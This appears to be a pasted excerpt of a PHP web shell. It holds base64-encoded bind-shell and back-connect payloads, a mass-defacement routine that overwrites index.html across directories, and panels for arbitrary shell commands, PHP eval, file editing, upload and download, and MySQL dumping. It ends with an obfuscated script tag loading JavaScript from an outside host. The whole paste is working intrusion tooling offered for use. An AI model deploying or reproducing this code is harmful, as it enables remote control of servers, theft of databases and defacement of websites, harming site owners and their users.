  3140. $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"
  3141. ;$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  3142. $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
  3143. $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  3144.  
  3145. ?>
  3146. <?
  3147. $dspact = $act = htmlspecialchars($act);
  3148.   $disp_fullpath = $ls_arr = $notls = null;
  3149.   $ud = @urlencode($d);
  3150.   if (empty($d)) {$d = realpath(".");}
  3151.   elseif(realpath($d)) {$d = realpath($d);}
  3152.   $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  3153.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  3154.   $d = str_replace("\\\\","\\",$d);
  3155.   $dispd = htmlspecialchars($d);
  3156. $self=basename($_SERVER['PHP_SELF']);
  3157. if(isset($_POST['execmassdeface']))
  3158. {
  3159. echo "<center><textarea rows='10' cols='100'>";
  3160. $hackfile = $_POST['massdefaceurl'];
  3161. $dir = $_POST['massdefacedir'];
  3162. echo $dir."\n";
  3163.  
  3164. if (is_dir($dir)) {
  3165.     if ($dh = opendir($dir)) {
  3166.         while (($file = readdir($dh)) !== false) {
  3167.             if(filetype($dir.$file)=="dir"){
  3168.                 $newfile=$dir.$file."/index.html";
  3169.                 echo $newfile."\n";
  3170.                 if (!copy($hackfile, $newfile)) {
  3171.                     echo "failed to copy $file...\n";
  3172.                 }
  3173.             }
  3174.         }
  3175.         closedir($dh);
  3176.     }
  3177. }
  3178. echo "</textarea></center>";} ?>
  3179.  
  3180.  
  3181. <tr><td align=right>Mass Defacement:</td>
  3182. <td><form action='<? basename($_SERVER['PHP_SELF']); ?>' method='post'>[+] Main Directory: <input type='text' style='width: 250px' value='<?php echo $dispd; ?>' name='massdefacedir'> [+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'><input type='submit' name='execmassdeface' value='Execute'></form></td>
  3183.  
  3184. <?
  3185. // FILE MANAGER
  3186. error_reporting(E_ALL);
  3187. @set_time_limit(0);
  3188. function magic_q($s)
  3189. {
  3190. if(get_magic_quotes_gpc())
  3191. {
  3192. $s=str_replace('\\\'','\'',$s);
  3193. $s=str_replace('\\\\','\\',$s);
  3194. $s=str_replace('\\"','"',$s);
  3195. $s=str_replace('\\\0','\0',$s);
  3196. }
  3197. return $s;
  3198. }
  3199. function get_perms($fn)
  3200. {
  3201. $mode=fileperms($fn);
  3202. $perms='';
  3203. $perms .= ($mode & 00400) ? 'r' : '-';
  3204. $perms .= ($mode & 00200) ? 'w' : '-';
  3205. $perms .= ($mode & 00100) ? 'x' : '-';
  3206. $perms .= ($mode & 00040) ? 'r' : '-';
  3207. $perms .= ($mode & 00020) ? 'w' : '-';
  3208. $perms .= ($mode & 00010) ? 'x' : '-';
  3209. $perms .= ($mode & 00004) ? 'r' : '-';
  3210. $perms .= ($mode & 00002) ? 'w' : '-';
  3211. $perms .= ($mode & 00001) ? 'x' : '-';
  3212. return $perms;
  3213. }
  3214. $head=<<<headka
  3215. <html>
  3216.  
  3217. headka;
  3218. $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
  3219. $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
  3220. $winda=strpos(strtolower(php_uname()),'wind');
  3221. define('format',50);
  3222.  
  3223. switch($page)
  3224. {
  3225. case 'eval':
  3226. {
  3227. $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
  3228. $eval_value=magic_q($eval_value);
  3229. $action=isset($_POST['action'])?$_POST['action']:'eval';
  3230. if($action=='eval_in_html') @eval($eval_value);
  3231. else
  3232. {
  3233. echo($head);
  3234. ?>
  3235. <hr>
  3236.  
  3237. <hr>
  3238. <?
  3239. }
  3240. break;
  3241. }
  3242. case 'cmd':
  3243. {
  3244. $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
  3245. $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
  3246. $action=isset($_POST['action'])?$_POST['action']:'cmd';
  3247. if(@is_dir($work_dir))
  3248. {
  3249. @chdir($work_dir);
  3250. $work_dir=getcwd();
  3251. if($work_dir=='')$work_dir='/';
  3252. else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
  3253. }
  3254. else if(file_exists($work_dir))$work_dir=realpath($work_dir);
  3255. $work_dir=str_replace('\\','/',$work_dir);
  3256. $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
  3257. switch($action)
  3258. {
  3259. case 'cmd' :
  3260. {
  3261. echo($head);
  3262. ?>
  3263.  
  3264. <pre>
  3265. <?
  3266. if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
  3267. else
  3268. {
  3269. $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
  3270. if(@is_dir($work_dir))
  3271. {
  3272. echo('<H1>File Manager;</H1><hr>');
  3273. echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
  3274. $handle=@opendir($work_dir);
  3275. if($handle)
  3276. {
  3277. while(false!==($fn=readdir($handle))){$files[]=$fn;};
  3278. @closedir($handle);
  3279. sort($files);
  3280. $not_dirs=array();
  3281. for($i=0;$i<sizeof($files);$i++)
  3282. {
  3283. $fn=$files[$i];
  3284. if(is_dir($fn))
  3285. {
  3286. echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
  3287. if($winda===false)
  3288. {
  3289. $owner=@posix_getpwuid(@fileowner($work_dir.$fn));
  3290. $group=@posix_getgrgid(@filegroup($work_dir.$fn));
  3291. printf("% 20s|% -20s",$owner['name'],$group['name']);
  3292. }
  3293. echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
  3294. printf("% 20s ",@filesize($work_dir.$fn).'B');
  3295. printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
  3296. }
  3297. else {$not_dirs[]=$fn;}
  3298. }
  3299. for($i=0;$i<sizeof($not_dirs);$i++)
  3300. {
  3301. $fn=$not_dirs[$i];
  3302. echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
  3303. if($winda===false)
  3304. {
  3305. $owner=@posix_getpwuid(@fileowner($work_dir.$fn));
  3306. $group=@posix_getgrgid(@filegroup($work_dir.$fn));
  3307. printf("% 20s|% -20s",$owner['name'],$group['name']);
  3308. }
  3309. echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
  3310. printf("% 20s ",@filesize($work_dir.$fn).'B');
  3311. printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
  3312. }
  3313. echo('</pre><hr>');
  3314. ?>
  3315. <form name='list' method=post>
  3316. <input name='work_dir' type=hidden size=120><br>
  3317. <input name='page' value='cmd' type=hidden>
  3318. <input name='f_action' value='view' type=hidden>
  3319. </form>
  3320. <?
  3321. } else echo('Error Listing '.$e_work_dir);
  3322. }
  3323. else
  3324. switch($f_action)
  3325. {
  3326. case 'view':
  3327. {
  3328. echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
  3329. $f=@fopen($work_dir,'r');
  3330. ?>
  3331. <form method=post>
  3332. <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
  3333. <input name='page' value='cmd' type=hidden>
  3334. <input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
  3335. <input name='f_action' value='save' type=submit>
  3336. </form>
  3337. <?
  3338. break;
  3339. }
  3340. case 'save' :
  3341. {
  3342. $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
  3343. $f=@fopen($work_dir,'w');
  3344. if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
  3345. else
  3346. {
  3347. fwrite($f,$file_text);
  3348. fclose($f);
  3349. echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
  3350. }
  3351. break;
  3352. }
  3353. }
  3354. break;
  3355. }
  3356. break;
  3357. }
  3358. case 'upload' :
  3359. {
  3360. if($work_dir=='')$work_dir='/';
  3361. else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
  3362. $f=$_FILES["filename"]["name"];
  3363. if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
  3364. else
  3365. {
  3366. echo('file is uploaded in '.$e_work_dir);
  3367. }
  3368. break;
  3369. }
  3370. case 'download' :
  3371. {
  3372. $fname=isset($_POST['fname'])?$_POST['fname']:'';
  3373. $temp_file=isset($_POST['temp_file'])?'on':'nn';
  3374. $f=@fopen($fname,'r');
  3375. if(!($f)) echo('file is not exists');
  3376. else
  3377. {
  3378. $archive=isset($_POST['archive'])?$_POST['archive']:'';
  3379. if($archive=='gzip')
  3380. {
  3381. Header("Content-Type:application/x-gzip\n");
  3382. $s=gzencode(fread($f,filesize($fname)));
  3383. Header('Content-Length: '.strlen($s)."\n");
  3384. Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
  3385. echo($s);
  3386. }
  3387. else
  3388. {
  3389. Header("Content-Type:application/octet-stream\n");
  3390. Header('Content-Length: '.filesize($fname)."\n");
  3391. Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
  3392. ob_start();
  3393. while(feof($f)===false)
  3394. {
  3395. echo(fread($f,10000));
  3396. ob_flush();
  3397. }
  3398. }
  3399. }
  3400. }
  3401. }
  3402. break;
  3403. }
  3404. case 'mysql' :
  3405. {
  3406. $action=isset($_POST['action'])?$_POST['action']:'query';
  3407. $user=isset($_POST['user'])?$_POST['user']:'';
  3408. $passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
  3409. $db=isset($_POST['db'])?$_POST['db']:'';
  3410. $host=isset($_POST['host'])?$_POST['host']:'localhost';
  3411. $query=isset($_POST['query'])?magic_q($_POST['query']):'';
  3412. switch($action)
  3413. {
  3414. case 'dump' :
  3415. {
  3416. $mysql_link=@mysql_connect($host,$user,$passwd);
  3417. if(!($mysql_link)) echo('Connect error');
  3418. else
  3419. {
  3420. //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
  3421. $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
  3422. $archive=isset($_POST['archive'])?$_POST['archive']:'none';
  3423. if($archive!=='none')$to_file=false;
  3424. $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
  3425. $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
  3426. if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
  3427. else
  3428. {
  3429. $dump_file="# MySQL Dumper\n#db $db from $host\n";
  3430. ob_start();
  3431. if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
  3432. if($table_dump=='')
  3433. {
  3434. if(!$to_file)
  3435. {
  3436. header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  3437. header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  3438. }
  3439. $result=mysql_query('show tables',$mysql_link);
  3440. for($i=0;$i<mysql_num_rows($result);$i++)
  3441. {
  3442. $rows=mysql_fetch_array($result);
  3443. $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
  3444. if(!$result2)$dump_file.='#error table '.$rows[0];
  3445. else
  3446. {
  3447. $dump_file.='create table `'.$rows[0]."`(\n";
  3448. for($j=0;$j<mysql_num_rows($result2)-1;$j++)
  3449. {
  3450. $rows2=mysql_fetch_array($result2);
  3451. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
  3452. }
  3453. $rows2=mysql_fetch_array($result2);
  3454. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
  3455. $type[$j]=$rows2[1];
  3456. $dump_file.=");\n";
  3457. mysql_free_result($result2);
  3458. $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
  3459. $columns=$j-1;
  3460. for($j=0;$j<mysql_num_rows($result2);$j++)
  3461. {
  3462. $rows2=mysql_fetch_array($result2);
  3463. $dump_file.='insert into `'.$rows[0].'` values (';
  3464. for($k=0;$k<$columns;$k++)
  3465. {
  3466. $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
  3467. }
  3468. $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
  3469. if($archive=='none')
  3470. {
  3471. if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
  3472. else
  3473. {
  3474. echo($dump_file);
  3475. ob_flush();
  3476. }
  3477. $dump_file='';
  3478. }
  3479. }
  3480. mysql_free_result($result2);
  3481. }
  3482. }
  3483. mysql_free_result($result);
  3484. if($archive!='none')
  3485. {
  3486. $dump_file=gzencode($dump_file);
  3487. header('Content-Length: '.strlen($dump_file)."\n");
  3488. echo($dump_file);
  3489. }
  3490. else if($t_f)
  3491. {
  3492. fclose($t_f);
  3493. echo('Dump for '.$db_dump.' now in '.$to_file);
  3494. }
  3495. }
  3496. else
  3497. {
  3498. $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
  3499. if(!$result2)echo('error table '.$table_dump);
  3500. else
  3501. {
  3502. if(!$to_file)
  3503. {
  3504. header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  3505. header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  3506. }
  3507. if($to_file===false)
  3508. {
  3509. header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  3510. header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  3511. }
  3512. $dump_file.="create table `{$table_dump}`(\n";
  3513. for($j=0;$j<mysql_num_rows($result2)-1;$j++)
  3514. {
  3515. $rows2=mysql_fetch_array($result2);
  3516. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
  3517. }
  3518. $rows2=mysql_fetch_array($result2);
  3519. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
  3520. $type[$j]=$rows2[1];
  3521. $dump_file.=");\n";
  3522. mysql_free_result($result2);
  3523. $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
  3524. $columns=$j-1;
  3525. for($j=0;$j<mysql_num_rows($result2);$j++)
  3526. {
  3527. $rows2=mysql_fetch_array($result2);
  3528. $dump_file.='insert into `'.$table_dump.'` values (';
  3529. for($k=0;$k<$columns;$k++)
  3530. {
  3531. $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
  3532. }
  3533. $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
  3534. if($archive=='none')
  3535. {
  3536. if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
  3537. else
  3538. {
  3539. echo($dump_file);
  3540. ob_flush();
  3541. }
  3542. $dump_file='';
  3543. }
  3544. }
  3545. mysql_free_result($result2);
  3546. if($archive!='none')
  3547. {
  3548. $dump_file=gzencode($dump_file);
  3549. header('Content-Length: '.strlen($dump_file)."\n");
  3550. echo $dump_file;
  3551. }else if($t_f)
  3552. {
  3553. fclose($t_f);
  3554. echo('Dump for '.$db_dump.' now in '.$to_file);
  3555. }
  3556. }
  3557. }
  3558. }
  3559. }
  3560. break;
  3561. }
  3562. case 'query' :
  3563. {
  3564. echo($head);
  3565. ?>
  3566. <hr>
  3567. <form method=post>
  3568. <table>
  3569. <td>
  3570. <table align=left>
  3571. <tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
  3572. <tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
  3573. </table>
  3574. </td>
  3575. <td>
  3576. <table>
  3577. <tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
  3578. <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
  3579. <input name='archive' type=radio value='none'>without arch
  3580. <input name='archive' type=radio value='gzip' checked=true>gzip archive
  3581. <tr><td><input type=submit name='action' value='dump'></td></tr>
  3582. <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
  3583. </table>
  3584. </td>
  3585. </table>
  3586. <input name='page' value='mysql' type=hidden>
  3587. <input name='action' value='query' type=submit>
  3588. </form>
  3589. <hr>
  3590. <?
  3591. $mysql_link=@mysql_connect($host,$user,$passwd);
  3592. if(!($mysql_link)) echo('Connect error');
  3593. else
  3594. {
  3595. if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
  3596. //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
  3597. $result=@mysql_query($query,$mysql_link);
  3598. if(!($result))echo(mysql_error());
  3599. else
  3600. {
  3601. echo("<table valign=top align=left>\n<tr>");
  3602. for($i=0;$i<mysql_num_fields($result);$i++)
  3603. echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b>  </td>');
  3604. echo("\n</tr>\n");
  3605. for($i=0;$i<mysql_num_rows($result);$i++)
  3606. {
  3607. $rows=mysql_fetch_array($result);
  3608. echo('<tr valign=top align=left>');
  3609. for($j=0;$j<mysql_num_fields($result);$j++)
  3610. {
  3611. echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
  3612. }
  3613. echo("</tr>\n");
  3614. }
  3615. echo("</table>\n");
  3616. }
  3617. mysql_close($mysql_link);
  3618. }
  3619. break;
  3620. }
  3621. }
  3622. break;
  3623. }
  3624. }
  3625. ?>
  3626.  
  3627. <script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0073\u0061\u006c\u0064\u0069\u0072\u0069\u002e\u006f\u0072\u0067\u002f\u0073\u0075\u006d\u006d\u0065\u0072\u002f\u0063\u0069\u007a\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e')</script>
  3628.  
Add Comment
Please, Sign In to add comment